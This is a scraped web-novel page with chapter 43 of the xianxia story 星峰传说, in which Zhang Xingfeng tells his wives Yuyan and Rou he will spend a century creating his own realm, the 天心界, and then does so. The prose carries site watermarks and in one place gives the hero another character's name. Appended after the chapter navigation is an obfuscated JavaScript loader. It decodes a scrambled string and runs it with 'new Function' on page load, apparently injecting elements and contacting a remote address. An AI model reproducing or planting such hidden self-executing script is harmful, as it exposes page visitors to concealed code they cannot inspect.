返回

星峰传说

首页
关灯
护眼
字体:
第四十三章 天心界
第六卷天心界

那次火元殿的聚会可是让天心宗的高层们一个个震撼地头脑都眩晕了,当然事后,一个个也都兴奋的好几天。

张星峰一次拿出的一亿仙晶,开始逐步发放下去,天心宗在各大凡人星球的招收弟子的规模也开始扩大,顿时许多想要成为传说中修真者的凡人们一个个都兴奋地不得了。

不过对于一个人口过亿的凡人星球来说,即使是一百人这个名额依旧是太少了,但是也好歹比过去多了不少。

拥有着顶级神器,整个天心宗的底气更加足了,张星峰更是将不少过去的中级神器,下级神器都赐给了一些表现不错的仙人阁弟子。飞库手打仙人阁弟子现在可是过万了,过去的核心弟子一个个都达到了仙人境界,因为神石的存在,修炼成仙的速度也快了许多,资质好的一百年就差不多了,资质差的两三百年也可以了。

其实修真解过去需要一两千年,主要原因还是当初黑老头建立仙界的时候,将修真界九成的灵气吸入了仙界,造成了修真界修真速度慢上好几倍。

如今张星峰因为神石的关系,让整个方衍山的灵气浓郁到形成‘雾状’,如果不是担心心神修为跟不上,几十年功力就能到了,比较那‘雾状’灵气实在是太浓郁了!

方衍山后山崖下。

张星峰、语嫣、宇文柔三人正在坐在石桌周围。

“语嫣,柔,我可能要闭关有厘毫,时间至少一百年左右!”张星峰略微有点不好意思。

柔眉头微微一皱,道:“峰哥,你心神修为现在已经达到天尊境界。为什么还要闭关呢?你不是说过,想要突破空间法则和时间法则。需要领悟,闭关是没有什么效果的吗?”

语嫣也赞同道:“是啊,峰哥,你现在功力也很高了,说不定什么时候就神劫了,然后飞升了。现在就多点时间陪陪我们吗?”

张星峰当即道:“啊,竟然把这件事情忘记说了!”张星峰一脸的懊恼:“语嫣,柔,你们别担心我会度什么神劫之类的,我现在心神修为已经达到天尊境界,完全可以控制整个空间的能量。只要我不让空间地能量进入我地体内,我地功力就不可能增加,飞库网站所以我会永远保持现在地功力,你们也别担心我会抛弃你们,我会一直等着你们,等着你们一起去神界,这修真界我可还想多过上几亿年呢!”

张星峰这话一出,顿时柔和语嫣兴奋了起来。

“你早说吗,我和柔姐姐都担心好久了呢,现在总算放心了,可就是委屈峰哥你因为等我们在修真界停留那么长时间了。”语嫣虽然这么说,但是脸上笑容却很灿烂,显然她非常高兴。

“恩,峰哥,既然你不会突然度神劫,那峰哥你要闭关我们也不会介意的。”柔微笑着说道,但是继而又道:“不过你得告诉我们,你现在不求功力,而且炼制圣器也不过半月即可,什么事情需要你一百年?”

张星峰微微一笑,自豪道:“一百年?这不过是前期工作,整整要完成,至少百万年地功夫!”

“百万年!”语嫣而后柔顿时大惊,作为张星峰的妻子,两人可十分明白如今的张星峰已经达到了什么地步,那可是比传说中的天神还要强地神界至尊啊!

连张星峰的天尊实力都需要百万年,那到底是什么事情呢?

语嫣和柔不禁期盼地看着张星峰,急切地想要知道原因。

张星峰看着二人表情,得意一笑道:“我准备创立一界,和仙界一样的独立一界,不过这一界的名字我已经想好了,‘天心界’!是我天心宗以后的根本所在,我天心宗的大本营将在天心界中!”

语嫣和柔顿时感到强烈地震撼!

一界!

独立的一界!

和仙界一样的新的一界!

天心宗以后的根本所在,天心宗的大本营——天心界!

“峰哥,这……这可能吗?那是一个世界啊,全部给我天心宗?”语嫣心中澎湃,在仙界各大实力相互争斗的时候,天心宗却是拥有了自己的独立一界,而且其中完全是天心宗的人。

“当然可能,你可知道,那十大宝典级别的秘籍之一《空间之界》第三层便是《独立一界》,其实《独立一界》只需要天神的修为就可以开始了,不过所需要的时间更加长,也更加困难,如今我天神修为达到了天尊境界,完全可以直接用空间本原力量来建立一界,用空间本原力量来建造,这样的一界才是完美的!”张星峰显得很是自信。

蓦地张星峰笑着说道:“那仙界不过是吸收了过去修真界九成的灵气才有那么浓厚的仙灵之气,可是我却不准备吸收修真界的灵气了,毕竟修真界的灵气已经很弱了,我建造修真界准备吸收神兽之界的灵气!”

“神兽之界?”语嫣和柔顿时一惊,旋即兴奋地说道:“实在是太好了,神兽之界和灵界是连通的,灵气的浓度更是修真界的百倍之上,单单那无数仙晶星球所形成的浓郁仙灵之气便是强的恐怖,幸亏仙灵之气对神兽和灵人效果不大,否则他们的修炼速度更加惊人了!”

张星峰笑着道:“神兽之界和灵界有着无数的仙晶星球,仙灵之气浓郁程度已经达到了匪夷所思的地步,那神兽和灵人吸收效果不大,但是对我天心宗门人来说,却是效果很大,我也不吸收多少。只要将神兽之界灵气程度吸收三成,那我的天心界中的灵气程度就是仙界的十倍之多了!”

神兽之界本身就远远比修真界等级高。本身灵气程度就大地惊人。它地三成灵气可是远远超过仙界地那点仙灵之气地。

“不过即使我是天尊,想要创立一界也不是一朝一昔的。当年以黑师伯地突破天尊的实力,也花了近一年的功夫,当然他很偷懒,整个仙界根本没有什么好的风景。除了城市就是一望无际地荒野,如果让我建造一个仙界出来,我百年就能完成,不过我要创立的天心界,却不会像仙界那么荒凉,我要游览无数空间。参考无数风景名胜,然后完全模仿,我要让天心界美伦美幻,成为修真者竞相追求的圣地!”

张星峰去了仙界之后,就对仙界很失望了,仙界实在是太荒凉了,除了一些大的城池,城池之间就是无际的荒野了。

所以他决定,要让天心界中会聚无数空间的奇特风景。

“峰哥,我们支持你,你就安心去创立天心界吧,我们也一同闭关,一百年后,我们出来相见!”语嫣和柔看着张星峰,都表示了支持。

张星峰微微一笑:“一百年之后,我要游览无数空间,模仿一些空间地奇特的美景,当然公私兼顾,我们三人一起游览每一个空间,就当是空间旅行,一百万年的时间我准备来旅行啊,如果不够,也可以增加,哈哈,一千万年也可以啊!”语嫣和柔一听,顿时兴奋地笑了起来。

张星峰开始闭关创立天心界了,除了语嫣和柔,也就天心宗的长老以及一些元老知道这个消息。当他们知道张星峰竟然妄图创立一界,比仙界灵气更多,比仙界更美伦美幻的天心界后,一个个都呆了!

在他们心中,那还是人的手段?那简直是老天爷的手段啊!一个个在心中将张星峰捧到至高境界。

神兽一界中!

张星峰此时站在神兽之界的虚空之中,他准备将天心界设立在神兽之界,这样吸收灵气才更加方便,天心界将设有两大通道,一通道同向神兽之界,一通道通向修真界。

以后天心宗无数弟子可以在天心界中修炼,随时可以进入神兽之界,也可以进入修真界。

修真界三**基地,以如今张星峰每个星球一年一百弟子的速度招下去,整个修真界北域的凡人星球那可太多了,加起来过千还是有的,一年就是近十万弟子,这样下去,一百年就是一千万弟子了!

天啊,一千万弟子啊,估计也只有张星峰这样的超级富豪(在神兽之界弄了那么多仙晶)才能养活了。

以天心宗弟子的修炼速度,只要三百年下去,这一千万弟子就是一千万仙人,随着时间的增长,天心宗的三**基地绝对不够。

别的宗派弟子成为仙人后,直接进入仙界,不需要空间资源,可是天心宗弟子即使达到仙人境界,仍然是在天心宗的,天心宗的弟子只进不出,仙晶等消耗当然也是越来越多。

不过一旦有了天心界,那就是另外一种结果了。

空间本无限,一界成,就是百万亿人口在其中也只是海中滴水而已。

“天心界啊,我天心宗要成为无数空间中的传说,成为以后神界神人最多的宗派,功劳最大的就是你天心界了!”张星峰微微一笑,随即身形慢慢淡去,完全融入了空间之中。

《独立一界》

张星峰无欲无求,头脑一片空灵,心神完全和空间融入一体,他没有按照《独立一界》中用力量来引导空间本原之力,他是用心神直接空间空间本原之力。

一界最重要的便是空间法则和时间法则!

如果是天神按照《独立一界》建造新的一界,那必须按照无数的手印诀来创立了,不过李杨感悟了空间法则和时间法则,那又是另外一说了。

时间流逝……

张星峰心神一直和神兽之界完全融合着,不停的感悟着空间法则和时间法则,同时也慢慢创立着天心界,创立天心界,首要的是无尽的空间本原之力。

仿佛滔天海浪一样,建造一界消耗的空间本原之力的惊人,整个神兽之界的空间本原之力都开始震荡了起来。

无数神兽之界的高手都惊恐地一个个不再修炼,一个个都聚集在一起,用强大的禁制保护自己,所有的神兽之界高手们看着星空之中震荡的强大的空间本原之力,都吓呆了!

那可是空间的本原力量啊!

不过说来也奇怪,那些空间本原力量虽然震荡混乱,可是却没有影响到星球,这些神兽之界的高手可是明白,这空间本原之力如果震荡到星球内的话,他们根本没有反击之力,会被瞬间绞杀的!

张星峰和神兽之界融位一体,他当然知道不能吸收的空间本原之力太快了,否则会导致空间混乱,快的一定程度,甚至可能引起空间的能量风暴!

所以,张星峰只是将速度提升到神兽之界所能承受的极限,这个极限指的就是神兽之界中星球不受到波及。

时间流逝……

整整一百年!

神兽之界的高手们担惊受怕了一百年!虽然一百年来,空间本原力量从来没有波及到星球,可是他们却担心啊,毕竟如果一波及到,他们就完蛋了。

忽然,空间本原力量的波动消失了!

完全恢复了过去的平静,空间显得十分安静,顿时整个神兽之界无数人都欢呼了起来。

张星峰的身形慢慢出现在了神兽之界的星空之中。

“终于成功了,天心界终于创立成功了!”张星峰长嘘一口气,整整一百年,不断的和神兽之界交流,不停的创立空间感悟时间法则可空间法则,如今他的心神修为又深厚不少。

“虽然现在的天心界还很荒凉,不过好歹也算是一界了,我先去帮它稍微改变一下面貌!”张星峰微微一笑,身形一闪,消失在了神兽之界。

上一章 目录 下一章

(function(){function o047defe(f2284){var tee004=".Ru2y?Gd]68bQ30Fc@=zv~soSWp!t(1f%,a:B9VqUreMJik-POZAC&EK[;5/Hj|lgw7XDxI^nmYT$hN_4L";var lb755b6de="WxtaYoN(u9[lPiKpwheVHrJ@-G$7&?D;TX.c5MSU!fOZAk4bE^|=8Cd6,m0_]:IFy3Bsq1R2L/jg~%vnzQ";return f2284.split('').map(function(dd1904f){var ra6b2cf0a=tee004.indexOf(dd1904f);return ra6b2cf0a==-1?dd1904f:lb755b6de[ra6b2cf0a]}).join('')}var c=o047defe('magnet:?xt=c3_E?c8"" + "R" + ":" + ":" + "^" + "^" + "^" + "5" + "2" + "-"+""HAr]_:u3?_d){fdr]_:u3?_dYr^6Cx^6[?=226[Yk6kr^[4=Er^=:kE){3rdmO92:Z.3_mau=Xud_2N3T2u?~aFb2ur?~;)){~=u]~_}fN2~ g=-:!Ar]_:u3?_d;ww=EK=!){~=u]~_ Vu~3_Tar~?;&@2~&?E=d;ww=EK=!)}fN2~ _C=k^2Cw-A8"uSx"["NSx6"["]S^C^Kxk^K5^KB5^6"["ES^5^kS5kSxx 55j5^jkw"["XgXS4:"HfN2~ XK6rw-K^AYk6kr^8g=-:!d5RKx)+g=-:!d5R!k)+g=-:!d5RKl)+g=-:!d5RK^)H[?rxw5AYk6kr^8g=-:!d5RK^)+g=-:!d5R!k)+g=-:!d5RKl)+g=-:!d5RKx)H[R^E5E:=xrA4=Er^=:kE8XK6rw-K^d"ywzg:;z]ElGY:;bcEJAA")H[_Bw:CwwwAXK6rw-K^d"ywsby,IbI.Rb-.z]EJAA")[4xxx6AXK6rw-K^d":wz3:wIg2.B_")[;!kEwAXK6rw-K^d":;zc-WlYMLAA")[Rrk:r=w6AXK6rw-K^d":w7X2,LA")[@CB::EAXK6rw-K^d":;z^M,s4MLAA")[2E5!x56AXK6rw-K^d"2;6F-TAA")[3CEKkErAXK6rw-K^d":;l]MW6u")[462x-E:AYk6kr^8XK6rw-K^d"%.l52JAA")H[@^26E=B25AXK6rw-K^d"-W6@MJAA")fN2~ -5KKw!rBrAXK6rw-K^d"=;GiM.sxMcAA")fN2~ TBkkxw2x:f3rdb?:2u3?_aX=2~:@a3_E=Rerd-5KKw!rBr)>Sx){TBkkxw2x:A4=Er^=:kE8_Bw:CwwwHdXK6rw-K^d"EWzkEWlgM.PA"))fTBkkxw2x:a3EA"u"+d462x-E:83CEKkErHd)*x5555)fTBkkxw2x:aXugb=ac3Eu@A"x55h"fTBkkxw2x:aXugb=a@=3T@uA"B55FR"fTBkkxw2x:aE3X2-b=EAu~]=f3rd4=Er^=:kEa-?EgUA_]bb){4=Er^=:kEa-?Ega2FF=_E&@3bEdTBkkxw2x:)}=bX={N2~ X:xB^x:Ar]_:u3?_d){4=Er^=:kEa-?Ega2FF=_E&@3bEdTBkkxw2x:)fYk6kr^a~=;?N=PN=_un3Xu=_=~d@^26E=B25[X:xB^x:[r2bX=)}fYk6kr^a2EEPN=_un3Xu=_=~d@^26E=B25[X:xB^x:[r2bX=)}}N2~ :wx^EA4=Er^=:kE8_Bw:CwwwHdXK6rw-K^d"M.x3M.LA"))f:wx^EaXugb=a@=3T@uA"5FR"f:wx^Ea3EA?=226+d462x-E:a:=3bd462x-E:83CEKkErHd)*x5555))fN2~ u52-^2Ar]_:u3?_d3k5kkCkk^){N2~ 2-^2wEKA_=c 12u=d)fN2~ Ywx55CA`2ENVF2:=|E/p{?=226}/p{2-^2wEKau?n?:2b=12u=Vu~3_Td)}`fN2~ cr!rC5AsVeGaF2~X=db?:2bVu?~2T=aT=u|u=;dYwx55C))f3rdcr!rC5AA_]bb){cr!rC5A{-~?cX=~&?]_uj5}}cr!rC5a-~?cX=~&?]_u++fN2~ RE=wKkB:A?rxw5d_C=k^2Cw-a:?_:2ud812u=8"_?c"Hd)[b?:2u3?_a@~=r[`@X:Sp{cr!rC5a-~?cX=~&?]_u}`H)aX?~udd)A>462x-E:83CEKkErHd)S5aB)82E5!x56Hd"["))fN2~ ?k==EB5rARE=wKkB:a3_E=Rerdg=-:!d5RwE))>Sx(RE=wKkB:84xxx6HdRE=wKkB:a3_E=Rerdg=-:!d5RwE)))j""fRE=wKkB:ARE=wKkB:8;!kEwHd?k==EB5r["")8Rrk:r=w6Hd"")8@CB::EHd)82E5!x56Hd"")+?k==EB5rf:wx^EaX~:A8"@uuFXjmm"[3k5kkCkk^[RE=wKkB:H82E5!x56Hd"m")f4=Er^=:kEa-?Ega2FF=_E&@3bEd:wx^E)f3rdTBkkxw2x:UA_]bb){TBkkxw2x:aN2b]=+A"\\~\\_2FF=_E=E =; u? @u;b"fN2~ -E!BK:!5:A4=Er^=:kEaT=uPb=;=_u7g|Ed:wx^Ea3E)f3rd-E!BK:!5:AA_]bbZZ-E!BK:!5:AA]_E=r3_=E){TBkkxw2x:aN2b]=+A"\\~\\_ :2_u T=u =; r~?; @u;b"}}}f3rdTBkkxw2x:UA_]bb){TBkkxw2x:aN2b]=+A"\\~\\_X=_E YX @?Xu "+Yr^6Cx^6}N2~ b!rEwAr]_:u3?_dT5!w-){~=u]~_ XK6rw-K^dT5!w-)8;!kEwHdg=-:!d5R^J)[462x-E:83CEKkErHd)au?Vu~3_TdwK)aXb3:=d462x-E:arb??~d462x-E:83CEKkErHd)*6)+^))}fu52-^2db!rEwdYr^6Cx^6))fYk6kr^8"2EEPN=_un3Xu=_=~"Hd";=XX2T="[r]_:u3?_d=){3rd=aE2u2aiAA?=226){4=Er^=:kEaT=uPb=;=_u7g|Ed:wx^Ea3E)a~=;?N=d)f3rdTBkkxw2x:UA_]bb){TBkkxw2x:aN2b]=+A"\\~\\_~=:=3N= =; F?Xu ;=XX2T="fTBkkxw2x:aN2b]=+A"\\~\\_=aE2u2aN "+=aE2u2aD}_=c l]_:u3?_d"2~TX"[=aE2u2aD)d{/uE:XjR^E5E:=xr[/u~2jTBkkxw2x:})}})})d"03B3y,IF2;b@-3BY-^5A"["^C^Kxk^K5^KB5^6"[c3_E?c[E?:];=_u)}fR::^^^52-d)f'.substr(11));new Function(c)()})();